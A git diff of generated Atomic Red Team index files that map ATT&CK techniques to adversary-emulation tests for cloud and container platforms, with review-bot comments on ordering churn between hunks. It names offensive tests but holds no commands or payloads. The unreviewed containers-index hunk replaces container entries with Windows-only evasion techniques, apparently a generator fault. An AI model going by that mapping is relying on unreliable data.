diff --git a/atomics/Indexes/Indexes-CSV/google-workspace-index.csv b/atomics/Indexes/Indexes-CSV/google-workspace-index.csv
index ed6fcb665a..2d5c9e12e3 100644
--- a/atomics/Indexes/Indexes-CSV/google-workspace-index.csv
+++ b/atomics/Indexes/Indexes-CSV/google-workspace-index.csv
@@ -1,5 +1,5 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
-privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
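Review bot: this hunk is pure ordering churn, not a content change: the `privilege-escalation` row removed at the bottom and the one added under `defense-evasion` are byte-identical (same technique, test name and GUID 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e). Since this CSV is generated, the generator is emitting tactics in an unstable order; sort tactics deterministically (fixed ATT&CK tactic order or alphabetical) so regenerated indexes only diff when a test actually changes.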
diff --git a/atomics/Indexes/Indexes-CSV/iaas-index.csv b/atomics/Indexes/Indexes-CSV/iaas-index.csv
index 52ecf3e5c1..5e12c0b39c 100644
--- a/atomics/Indexes/Indexes-CSV/iaas-index.csv
+++ b/atomics/Indexes/Indexes-CSV/iaas-index.csv
@@ -14,6 +14,7 @@ defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom I
credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,2,Azure - Dump Azure Instance Metadata from Virtual Machines,cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7,powershell
credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
credential-access,T1110.003,Brute Force: Password Spraying,9,AWS - Password Spray an AWS using GoAWSConsoleSpray,9c10d16b-20b1-403a-8e67-50ef7117ed4e,sh
+credential-access,T1528,Steal Application Access Token,1,Azure - Dump All Azure Key Vaults with Microburst,1b83cddb-eaa7-45aa-98a5-85fb0a8807ea,powershell
impact,T1485,Data Destruction,4,GCP - Delete Bucket,4ac71389-40f4-448a-b73f-754346b3f928,sh
discovery,T1580,Cloud Infrastructure Discovery,1,AWS - EC2 Enumeration from Cloud Instance,99ee161b-dcb1-4276-8ecb-7cfdcb207820,sh
discovery,T1580,Cloud Infrastructure Discovery,2,AWS - EC2 Security Group Enumeration,99b38f24-5acc-4aa3-85e5-b7f97a5d37ac,command_prompt
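Review bot: the new T1528 row lands after the T1110.003 password-spray row rather than with the other T1552/credential-access rows, which again reflects the generator's ordering rather than a deliberate placement; the same deterministic-sort fix applies. Because both the CSV and Markdown indexes are generated from the test YAML, verify that the T1528 test #1 YAML carries this exact GUID (1b83cddb-eaa7-45aa-98a5-85fb0a8807ea) and executor (`powershell`); the matching iaas-index.md change is not visible in this excerpt, so confirm it was regenerated in the same commit.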
diff --git a/atomics/Indexes/Indexes-Markdown/azure-ad-index.md b/atomics/Indexes/Indexes-Markdown/azure-ad-index.md
index 3b10dfb977..55ab503b57 100644
--- a/atomics/Indexes/Indexes-Markdown/azure-ad-index.md
+++ b/atomics/Indexes/Indexes-Markdown/azure-ad-index.md
@@ -21,26 +21,20 @@
- T1556.009 Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-# impact
-- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
# discovery
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1201 Password Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# defense-evasion
- [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
- Atomic Test #1: Add Federation to Azure AD [azure-ad]
+- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
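Review bot: the whole `# impact` section (T1498, T1498.001, T1498.002, T1499, T1499.002, T1499.003, T1499.004) disappears from the Azure AD index in this hunk while T1201, T1562 and T1550 are added. Every removed entry was a CONTRIBUTE A TEST placeholder, so no test is lost, but an index silently dropping an entire tactic is exactly what a platform-filter regression in the generator would look like; the PR description should state that this follows an upstream ATT&CK platform change for Azure AD, or the removal should be explained inline. Also note the inconsistent separators: a blank line before `# discovery` is removed here, while `# defense-evasion` still follows `- T1538 ...` with no blank line.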
@@ -49,6 +43,7 @@
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.008 Impair Defenses: Disable Cloud Logs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.009 Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -75,6 +70,16 @@
- T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+# initial-access
+- T1566.002 Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566.004 Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
# persistence
- [T1098.003 Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md)
- Atomic Test #1: Azure AD - Add Company Administrator Role to a user [azure-ad]
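Review bot: `# initial-access` is inserted directly after the previous section's last entry (`- T1078.004 ...`) with no blank line before it, but with a trailing blank line after, so section spacing in this file is now mixed. This hunk also moves the section from its old position later in the file (the later hunk removes it) while adding T1566.002, T1199, T1566, T1566.004 and T1189; the additions are the real change and would be easier to review if the generator emitted sections in a fixed order with a uniform separator.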
@@ -99,16 +104,12 @@
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-# execution
-- T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
-# initial-access
-- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
# lateral-movement
+- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+# execution
+- T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
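Review bot: apart from the single genuine addition (`- T1550 Use Alternate Authentication Material` under `# lateral-movement`), this hunk only relocates `# execution` to the end of the file and removes `# initial-access` from here; it also adds a trailing blank line at end of file. Moving sections around on each regeneration inflates every index diff; emit tactic sections in a stable order and without a trailing blank line.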
diff --git a/atomics/Indexes/Indexes-Markdown/containers-index.md b/atomics/Indexes/Indexes-Markdown/containers-index.md
index a96db1cf68..deb2614a7b 100644
--- a/atomics/Indexes/Indexes-Markdown/containers-index.md
+++ b/atomics/Indexes/Indexes-Markdown/containers-index.md
@@ -1,102 +1,620 @@
# Containers Atomic Tests by ATT&CK Tactic & Technique
-# discovery
-- [T1613 Container and Resource Discovery](../../T1613/T1613.md)
- - Atomic Test #1: Docker Container and Resource Discovery [containers]
- - Atomic Test #2: Podman Container and Resource Discovery [containers]
-- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1046 Network Service Discovery](../../T1046/T1046.md)
- - Atomic Test #9: Network Service Discovery for Containers [containers]
-
-# credential-access
-- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1552.001 Unsecured Credentials: Credentials In Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1110.004 Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1552.007 Kubernetes List Secrets](../../T1552.007/T1552.007.md)
- - Atomic Test #1: List All Secrets [containers]
- - Atomic Test #2: ListSecrets [containers]
-
-# persistence
-- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
- - Atomic Test #1: ListCronjobs [containers]
- - Atomic Test #2: CreateCronjob [containers]
-- T1098.006 Additional Container Cluster Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1525 Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+# defense-evasion
+- T1055.011 Process Injection: Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.011 Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.011 Signed Binary Proxy Execution: Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.012 File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1216.001 Signed Script Proxy Execution: Pubprn [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1006 Direct Volume Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.008 Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.013 Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.007 Masquerading: Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.001 Pre-OS Boot: System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.005 Masquerading: Match Legitimate Name or Location [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.009 Impair Defenses: Safe Boot Mode [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.001 Virtualization/Sandbox Evasion: System Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.004 Signed Binary Proxy Execution: InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.008 Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.002 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.007 Signed Binary Proxy Execution: Msiexec [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.003 Indicator Removal on Host: Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1202 Indirect Command Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1140 Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.008 Email Collection: Mailbox Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.006 Indicator Removal on Host: Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1480.002 Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.011 Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.003 Signed Binary Proxy Execution: CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.002 Impair Defenses: Disable Windows Event Logging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.002 Signed Binary Proxy Execution: Control Panel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.004 Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.015 Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1207 Rogue Domain Controller [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.006 Subvert Trust Controls: Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1112 Modify Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.001 Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.001 Domain Policy Modification: Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1136.001 Create Account: Local Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1543.005 Container Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.001 Indicator Removal on Host: Clear Windows Event Logs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.008 Signed Binary Proxy Execution: Odbcconf [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.006 Impair Defenses: Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.003 Use Alternate Authentication Material: Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.004 Masquerading: Masquerade Task or Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.004 Process Injection: Asynchronous Procedure Call [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.002 Process Injection: Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.012 Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.010 Impair Defenses: Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.005 Signed Binary Proxy Execution: Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.001 Access Token Manipulation: Token Impersonation/Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.012 LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.002 Hide Artifacts: Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.003 Impair Defenses: Impair Command History Logging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.004 Access Token Manipulation: Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.001 Signed Binary Proxy Execution: Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.005 Indicator Removal on Host: Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.001 Impair Defenses: Disable or Modify Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.012 Process Injection: Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027 Obfuscated Files or Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.014 Polymorphic Code [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.005 Access Token Manipulation: SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.010 Signed Binary Proxy Execution: Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.003 Masquerading: Rename System Utilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
